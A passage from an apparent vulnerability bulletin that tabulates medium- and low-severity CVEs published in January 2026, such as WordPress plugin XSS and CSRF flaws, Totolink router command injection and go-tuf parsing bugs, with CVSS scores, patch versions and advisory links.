| swift-otel--swift-w3c-trace-context | Swift W3C TraceContext is a Swift implementation of the W3C Trace Context standard, and Swift OTel is an OpenTelemetry Protocol (OTLP) backend for Swift Log, Swift Metrics, and Swift Distributed Tracing. Prior to Swift W3C TraceContext version 1.0.0-beta.5 and Swift OTel version 1.0.4, a denial-of-service vulnerability due to improper input validation allows a remote attacker to crash the service via a malformed HTTP header. This allows crashing the process with data coming from the network when used with, for example, an HTTP server. Most common way of using Swift W3C Trace Context is through Swift OTel. Version 1.0.0-beta.5 of Swift W3C TraceContext and version 1.0.4 of Swift OTel contain a patch for this issue. As a workaround, disable either Swift OTel or the code that extracts the trace information from an incoming header (such as a `TracingMiddleware`). | 2026-01-19 | 5.3 | CVE-2026-23886 | https://github.com/swift-otel/swift-w3c-trace-context/security/advisories/GHSA-mvpq-2v8x-ww6g https://github.com/swift-otel/swift-w3c-trace-context/commit/5da9b143ba6046734de3fa51dafea28290174e4e https://github.com/swift-otel/swift-otel/releases/tag/1.0.4 https://github.com/swift-otel/swift-w3c-trace-context/releases/tag/1.0.0-beta.5 |
| tandubhai--Alchemist Ajax Upload | The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments. | 2026-01-24 | 5.3 | CVE-2025-14629 | https://www.wordfence.com/threat-intel/vulnerabilities/id/865dbcf5-7990-40f3-bb90-3ae359b52c6f?source=cve https://wordpress.org/plugins/alchemist-ajax-upload/ https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/tags/1.1/alchemist_ajax_upload.php#L231 https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/trunk/alchemist_ajax_upload.php#L231 |
| Tapandsign Technologies Software Inc.--Tap&Sign | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS). This issue affects Tap&Sign: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 4.7 | CVE-2025-2204 | https://www.usom.gov.tr/bildirim/tr-26-0004 |
| teamzt--ZT Captcha | The ZT Captcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to improper nonce validation on the save_ztcpt_captcha_settings action where the nonce check can be bypassed by sending an empty token value. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f9d6da5-1598-4df4-8efc-306370446443?source=cve https://plugins.trac.wordpress.org/browser/zt-captcha/trunk/request/CaptchaRequest.php#L37 https://plugins.trac.wordpress.org/browser/zt-captcha/tags/1.0.4/request/CaptchaRequest.php#L37 |
| technical-laohu--mpay | A security vulnerability has been detected in technical-laohu mpay up to 1.2.4. The impacted element is an unknown function of the component QR Code Image Handler. Such manipulation of the argument codeimg leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-19 | 4.7 | CVE-2026-1152 | VDB-341745 | technical-laohu mpay QR Code Image unrestricted upload VDB-341745 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735775 | https://gitee.com/technical-laohu/mpay mpay v1.2.4 Arbitrary file upload vulnerability https://github.com/bdkuzma/vuln/issues/17 |
| technical-laohu--mpay | A vulnerability was detected in technical-laohu mpay up to 1.2.4. This affects an unknown function. Performing a manipulation results in cross-site request forgery. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-01-19 | 4.3 | CVE-2026-1153 | VDB-341746 | technical-laohu mpay cross-site request forgery VDB-341746 | CTI Indicators (IOB, IOC) Submit #735789 | https://gitee.com/technical-laohu/mpay mpay v1.2.4 Cross-Site Request Forgery https://github.com/bdkuzma/vuln/issues/18 |
| tendenci--tendenci | Tendenci is an open source content management system built for non-profits, associations and cause-based sites. Versions 15.3.11 and below include a critical deserialization vulnerability in the Helpdesk module (which is not enabled by default). This vulnerability allows Remote Code Execution (RCE) by an authenticated user with staff security level due to using Python's pickle module in helpdesk /reports/. The original CVE-2020-14942 was incompletely patched. While ticket_list() was fixed to use safe JSON deserialization, the run_report() function still uses unsafe pickle.loads(). The impact is limited to the permissions of the user running the application, typically www-data, which generally lacks write (except for upload directories) and execute permissions. This issue has been fixed in version 15.3.12. | 2026-01-22 | 6.8 | CVE-2026-23946 | https://github.com/tendenci/tendenci/security/advisories/GHSA-339m-4qw5-j2g3 https://github.com/tendenci/tendenci/issues/867 https://github.com/tendenci/tendenci/commit/23d9fd85ab7654e9c83cfc86cb4175c0bd7a77f1 https://github.com/tendenci/tendenci/commit/2ff0a457614944a1b417081c543ea4c5bb95d636 https://github.com/tendenci/tendenci/commit/63e1b84a5b163466d1d8d811d35e7021a7ca0d0e https://docs.python.org/3/library/pickle.html#restricting-globals https://github.com/advisories/GHSA-jqmc-fxxp-r589 https://github.com/tendenci/tendenci/releases/tag/v15.3.12 |
| themeruby--ThemeRuby Multi Authors Assign Multiple Writers to Posts | The ThemeRuby Multi Authors - Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1097 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca74bb1d-1954-4869-aaa9-bf66600cdf2a?source=cve https://plugins.trac.wordpress.org/browser/themeruby-multi-authors/trunk/includes/class-tma-shortcodes.php#L76 https://plugins.trac.wordpress.org/browser/themeruby-multi-authors/tags/1.0.0/includes/class-tma-shortcodes.php#L76 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized attachment deletion due to a missing capability check on the `delete_existing_user_photo` function in all versions up to, and including, 3.9.4. This makes it possible for authenticated attackers, with subscriber level access and above, to delete arbitrary attachments on the site. | 2026-01-20 | 5.4 | CVE-2026-0548 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e475e02-494a-4ad0-a83c-d027c3a32989?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/tutor/tags/3.9.4/classes/User.php&new_path=/tutor/tags/3.9.5/classes/User.php |
| theupdateframework--go-tuf | go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available. | 2026-01-22 | 5.9 | CVE-2026-23991 | https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-846p-jg2w-w324 https://github.com/theupdateframework/go-tuf/commit/73345ab6b0eb7e59d525dac17a428f043074cef6 https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1 |
| theupdateframework--go-tuf | go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, a compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. This can lead to unauthorized modification to TUF metadata files is possible at rest, or during transit as no integrity checks are made. Version 2.3.1 fixes the issue. As a workaround, always make sure that the TUF metadata roles are configured with a threshold of at least 1. | 2026-01-22 | 5.9 | CVE-2026-23992 | https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525 https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0 |
| thimpress--LearnPress WordPress LMS Plugin for Create and Sell Online Courses | The LearnPress - WordPress LMS Plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.3.2.4 via the get_item_permissions_check function. This makes it possible for unauthenticated attackers to extract sensitive data including user first names and last names. Other information such as social profile links and enrollment are also included. | 2026-01-20 | 5.3 | CVE-2025-14798 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6fb00ce4-aa82-4479-b7f6-79e7bde098c1?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/jwt/rest-api/version1/class-lp-rest-users-v1-controller.php#L134 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/jwt/rest-api/version1/class-lp-rest-users-v1-controller.php#L35 |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below allow an authenticated user without the dlattachment permission to download FAQ attachments due to a incomprehensive permissions check. The presence of a right key is improperly validated as proof of authorization in attachment.php. Additionally, the group and user permission logic contains a flawed conditional expression that may allow unauthorized access. This issue has been fixed in version | 2026-01-24 | 6.5 | CVE-2026-24420 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7p9h-m7m8-vhhv |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below have flawed authorization logic which exposes the /api/setup/backup endpoint to any authenticated user despite their permissions. SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. Non-admin users can trigger a configuration backup and retrieve its path. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. This issue is fixed in version 4.0.17. | 2026-01-24 | 6.5 | CVE-2026-24421 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-wm8h-26fv-mg7g |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. In versions 4.0.16 and below, multiple public API endpoints improperly expose sensitive user information due to insufficient access controls. The OpenQuestionController::list() endpoint calls Question::getAll() with showAll=true by default, returning records marked as non-public (isVisible=false) along with user email addresses, with similar exposures present in comment, news, and FAQ APIs. This information disclosure vulnerability could enable attackers to harvest email addresses for phishing campaigns or access content that was explicitly marked as private. This issue has been fixed in version 4.0.17. | 2026-01-24 | 5.3 | CVE-2026-24422 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-j4rc-96xj-gvqc |
| Totolink--LR350 | A vulnerability was identified in Totolink LR350 9.3.5u.6369_B20220309. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument ip leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-01-19 | 6.3 | CVE-2026-1149 | VDB-341742 | Totolink LR350 POST Request cstecgi.cgi setDiagnosisCfg command injection VDB-341742 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735695 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setDiagnosisCfg-2e453a41781f800d9ba9c6da80b55276?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A security flaw has been discovered in Totolink LR350 9.3.5u.6369_B20220309. Impacted is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument command results in command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 6.3 | CVE-2026-1150 | VDB-341743 | Totolink LR350 POST Request cstecgi.cgi setTracerouteCfg command injection VDB-341743 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735696 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setTracerouteCfg-2e453a41781f803494e3e4161a393487?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A weakness has been identified in Totolink NR1800X 9.1.0u.6279_B20210910. This vulnerability affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. This manipulation of the argument Hostname causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-22 | 6.3 | CVE-2026-1326 | VDB-342302 | Totolink NR1800X POST Request cstecgi.cgi setWanCfg command injection VDB-342302 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735787 | TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setWanCfg-2e453a41781f80b390f3e1ce0d9dd5b9?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A security vulnerability has been detected in Totolink NR1800X 9.1.0u.6279_B20210910. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Such manipulation of the argument command leads to command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-22 | 6.3 | CVE-2026-1327 | VDB-342303 | Totolink NR1800X POST Request cstecgi.cgi setTracerouteCfg command injection VDB-342303 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735790 | TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setTracerouteCfg-2e453a41781f80df8ef9d32983758502?source=copy_link https://www.totolink.net/ |
| typemill--typemill | Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2. | 2026-01-23 | 5.4 | CVE-2026-24127 | https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c https://github.com/typemill/typemill/releases/tag/v2.19.2 |
| uncannyowl--Uncanny Automator Easy Automation, Integration, Webhooks & Workflow Builder Plugin | The Uncanny Automator - Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user with a verified Discord account accesses the injected page. | 2026-01-23 | 6.4 | CVE-2025-15522 | https://www.wordfence.com/threat-intel/vulnerabilities/id/41c54e1b-69b9-4594-8f1e-7ef17f120791?source=cve https://wordpress.org/plugins/uncanny-automator https://plugins.trac.wordpress.org/browser/uncanny-automator/tags/6.10.0.2/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php#L128 https://plugins.trac.wordpress.org/changeset/3440408/uncanny-automator/trunk/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php |
| vektor-inc--VK Google Job Posting Manager | The VK Google Job Posting Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Description field in versions up to, and including, 1.2.20 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-12836 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e0fd492-19ee-430e-a495-99ad28043bf9?source=cve https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L419 https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L468 |
| vintagedaddyo--MyBB Delete Account Plugin | MyBB Delete Account Plugin 1.4 contains a cross-site scripting vulnerability in the account deletion reason input field. Attackers can inject malicious scripts that will execute in the admin interface when viewing delete account reasons. | 2026-01-23 | 6.1 | CVE-2021-47905 | ExploitDB-49500 MyBB Delete Account Plugin Repository VulnCheck Advisory: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting |
| waqasvickey0071--WP Youtube Video Gallery | The WP Youtube Video Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce verification on the wpYTVideoGallerySettingSave() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14906 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53709d2c-6522-40f0-9dc4-82517d3ee7b2?source=cve https://plugins.trac.wordpress.org/browser/wp-youtube-video-gallery/tags/1.0/admin/admin.php#L444 |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot plugin for WordPress is vulnerable to unauthorized modification or loss of data due to a missing capability check on the 'wedocs_user_documentation_handling_capabilities' function in all versions up to, and including, 2.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit any documentation post. The vulnerability was partially patched in version 2.1.16. | 2026-01-23 | 4.3 | CVE-2025-13921 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c56234f3-7dd6-4dff-887d-5ddbf0cb7d3c?source=cve https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/functions.php#L506 https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/Installer.php#L21 https://plugins.trac.wordpress.org/changeset/3426704/ https://plugins.trac.wordpress.org/changeset/3440068/ |
| wedevs--weMail Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation | The weMail - Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.7. This is due to the plugin's REST API trusting the `x-wemail-user` HTTP header to identify users without verifying the request originates from an authenticated WordPress session. This makes it possible for unauthenticated attackers who know or can guess an admin email (easily enumerable via `/wp-json/wp/v2/users`) to impersonate that user and access the CSV subscriber endpoints, potentially exfiltrating subscriber PII (emails, names, phone numbers) from imported CSV files. | 2026-01-20 | 5.3 | CVE-2025-14348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59c0caa2-d0c2-472e-83c3-d11ad313720d?source=cve https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Csv.php#L79 https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Csv.php#L85 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3442404%40wemail%2Ftrunk&old=3423372%40wemail%2Ftrunk&sfp_email=&sfph_mail=#file1 |
| wizit--Wizit Gateway for WooCommerce | The Wizit Gateway for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Order Cancellation in all versions up to, and including, 1.2.9. This is due to a lack of authentication and authorization checks in the 'handle_checkout_redirecturl_response' function. This makes it possible for unauthenticated attackers to cancel arbitrary WooCommerce orders by sending a crafted request with a valid order ID. | 2026-01-24 | 5.3 | CVE-2025-14843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b6926c2c-79d4-477c-a2eb-ba62545f2e2b?source=cve https://plugins.trac.wordpress.org/browser/wizit-gateway-for-woocommerce/tags/1.2.9/class-wizit-gateway.php?marks=1249,1341-1349#L1249 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators. | 2026-01-19 | 5.4 | CVE-2025-15466 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0afcfe15-2d7d-4c96-a408-28f35577a927?source=cve https://plugins.trac.wordpress.org/changeset/3435746/ |
| wpdevteam--NotificationX FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar | The NotificationX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'regenerate' and 'reset' REST API endpoints in all versions up to, and including, 3.1.11. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset analytics for any NotificationX campaign, regardless of ownership. | 2026-01-20 | 4.3 | CVE-2026-0554 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3cd843b-ab38-45c4-a661-78d4e6db5201?source=cve https://research.cleantalk.org/cve-2026-0554 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail= |
| wpdirectorykit--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.9 via the wdk_public_action AJAX handler. This makes it possible for unauthenticated attackers to extract email addresses for users with Directory Kit-specific user roles. | 2026-01-24 | 5.3 | CVE-2025-13920 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8905dcc7-d3c8-4ae8-818c-df3e6ed2ad9c?source=cve https://plugins.trac.wordpress.org/changeset/3435482/wpdirectorykit |
| wpdiscover--Timeline Event History | The Timeline Event History plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `id` parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-24 | 6.1 | CVE-2026-1127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ba779595-2674-4d84-bc41-889ae60bd6a4?source=cve https://plugins.trac.wordpress.org/browser/timeline-event-history/tags/3.2/includes/admin/class-timeline-wp-field-builder.php#L540 |
| wpgmaps--WP Go Maps (formerly WP Google Maps) | The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the processBackgroundAction() function in all versions up to, and including, 10.0.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global map engine settings. | 2026-01-24 | 5.3 | CVE-2026-0593 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f0741c1-a5d7-41a4-a739-2cb7cb836509?source=cve https://plugins.trac.wordpress.org/changeset/3439283/wp-google-maps/trunk/includes/class.admin-notices.php |
| Yodinfo--Mini Mouse | Mini Mouse 9.3.0 contains a path traversal vulnerability that allows attackers to access sensitive system directories through the device information endpoint. Attackers can retrieve file lists from system directories like /usr, /etc, and /var by manipulating file path parameters in API requests. | 2026-01-21 | 6.2 | CVE-2021-47849 | ExploitDB-49747 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal |
| zainali99--MyBB Trending Widget Plugin | MyBB Trending Widget Plugin 1.2 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through thread titles. Attackers can modify thread titles with script payloads that will execute when other users view the trending widget. | 2026-01-23 | 6.1 | CVE-2018-25132 | ExploitDB-49504 Trending Widget GitHub Repository VulnCheck Advisory: MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting |
| zero1zerouk--Login Page Editor | The Login Page Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing nonce validation on the devotion_loginform_process() AJAX action. This makes it possible for unauthenticated attackers to update the plugin's login page settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f428b90d-8830-445d-b1f1-d8f860dae5cf?source=cve https://plugins.trac.wordpress.org/browser/login-page-editor/trunk/class/devotion.core.class.php#L50 https://plugins.trac.wordpress.org/browser/login-page-editor/tags/1.2/class/devotion.core.class.php#L50 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Athroniaeth--fastapi-api-key | FastAPI Api Key provides a backend-agnostic library that provides an API key system. Version 1.1.0 has a timing side-channel vulnerability in verify_key(). The method applied a random delay only on verification failures, allowing an attacker to statistically distinguish valid from invalid API keys by measuring response latencies. With enough repeated requests, an adversary could infer whether a key_id corresponds to a valid key, potentially accelerating brute-force or enumeration attacks. All users relying on verify_key() for API key authentication prior to the fix are affected. Users should upgrade to version 1.1.0 to receive a patch. The patch applies a uniform random delay (min_delay to max_delay) to all responses regardless of outcome, eliminating the timing correlation. Some workarounds are available. Add an application-level fixed delay or random jitter to all authentication responses (success and failure) before the fix is applied and/or use rate limiting to reduce the feasibility of statistical timing attacks. | 2026-01-21 | 3.7 | CVE-2026-23996 | https://github.com/Athroniaeth/fastapi-api-key/security/advisories/GHSA-95c6-p277-p87g https://github.com/Athroniaeth/fastapi-api-key/commit/310b2c5c77305f38c63c0b917539a0344071dfd8 https://github.com/Athroniaeth/fastapi-api-key/releases/tag/1.1.0 |
| backstage--backstage | Backstage is an open framework for building developer portals, and @backstage/backend-defaults provides the default implementations and setup for a standard Backstage backend app. Prior to versions 0.12.2, 0.13.2, 0.14.1, and 0.15.0, the `FetchUrlReader` component, used by the catalog and other plugins to fetch content from URLs, followed HTTP redirects automatically. This allowed an attacker who controls a host listed in `backend.reading.allow` to redirect requests to internal or sensitive URLs that are not on the allowlist, bypassing the URL allowlist security control. This is a Server-Side Request Forgery (SSRF) vulnerability that could allow access to internal resources, but it does not allow attackers to include additional request headers. This vulnerability is fixed in `@backstage/backend-defaults` version 0.12.2, 0.13.2, 0.14.1, and 0.15.0. Users should upgrade to this version or later. Some workarounds are available. Restrict `backend.reading.allow` to only trusted hosts that you control and that do not issue redirects, ensure allowed hosts do not have open redirect vulnerabilities, and/or use network-level controls to block access from Backstage to sensitive internal endpoints. | 2026-01-21 | 3.5 | CVE-2026-24048 | https://github.com/backstage/backstage/security/advisories/GHSA-q2x5-4xjx-c6p9 https://github.com/backstage/backstage/commit/27f9061d24affd1b9212fe0abd476bfc3fbaedcb |
| Beetel--777VR1 | A security flaw has been discovered in Beetel 777VR1 up to 01.00.09/01.00.09_55. This affects an unknown part of the component UART Interface. Performing a manipulation results in information disclosure. The attack may be carried out on the physical device. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1407 | VDB-342796 | Beetel 777VR1 UART information disclosure VDB-342796 | CTI Indicators (IOB, IOC, TTP) Submit #736322 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 Cleartext Exposure of Sensitive Credentials in Boot Logs - UART https://gist.github.com/raghav20232023/253c041842f622d9c2cb6ee4111c2227 |
| Beetel--777VR1 | A weakness has been identified in Beetel 777VR1 up to 01.00.09/01.00.09_55. This vulnerability affects unknown code of the component UART Interface. Executing a manipulation can lead to weak password requirements. The physical device can be targeted for the attack. The attack requires a high level of complexity. It is stated that the exploitability is difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1408 | VDB-342797 | Beetel 777VR1 UART weak password VDB-342797 | CTI Indicators (IOB, IOC, TTP) Submit #739384 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 CWE-521 — Weak Password Requirements https://gist.github.com/raghav20232023/9c51cbd91f3798b1c10f3f30fb631633 |
| Beetel--777VR1 | A security vulnerability has been detected in Beetel 777VR1 up to 01.00.09/01.00.09_55. This issue affects some unknown processing of the component UART Interface. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack on the physical device. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1409 | VDB-342798 | Beetel 777VR1 UART excessive authentication VDB-342798 | CTI Indicators (IOB, IOC, TTP) Submit #739399 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 CWE-307 Improper Restriction - Excessive Authentication Attempts https://gist.github.com/raghav20232023/19900b427445adf37f64ae953611bfce |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions 9.5.0.0 through 9.5.1.5, versions 9.6.0.0 through 9.7.1.10, versions 9.8.0.0 through 9.10.1.3, versions starting from 9.11.0.0 and prior to 9.13.0.0, contains a Time-of-check Time-of-use (TOCTOU) race condition vulnerability. A low privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to denial of service. | 2026-01-22 | 3.5 | CVE-2026-22281 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below have a Mass Assignment vulnerability in the settings management functionality due to insufficient input validation. The application's saveSettings() function accepts arbitrary key-value pairs without validating property names against allowed settings. The function uses Record<string, any> as input type and iterates over all entries using Object.entries() without filtering unauthorized properties. Any field sent by the attacker is directly persisted to the database, regardless of whether it corresponds to a legitimate application setting. This issue has been fixed in version 1.7.78. | 2026-01-23 | 2.7 | CVE-2026-24140 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-c938-x24g-fxcx https://github.com/franklioxygen/MyTube/commit/9d737cb373f7af3e5c92d458e2832caf817b6de6 |
| HCL Software--AION | HCL AION is affected by a Missing Security Response Headers vulnerability. The absence of standard security headers may weaken the application's overall security posture and increase its susceptibility to common web-based attacks. | 2026-01-19 | 3.5 | CVE-2025-55249 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION is affected by an Unrestricted File Upload vulnerability. This can allow malicious file uploads, potentially resulting in unauthorized code execution or system compromise. | 2026-01-19 | 3.1 | CVE-2025-55251 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
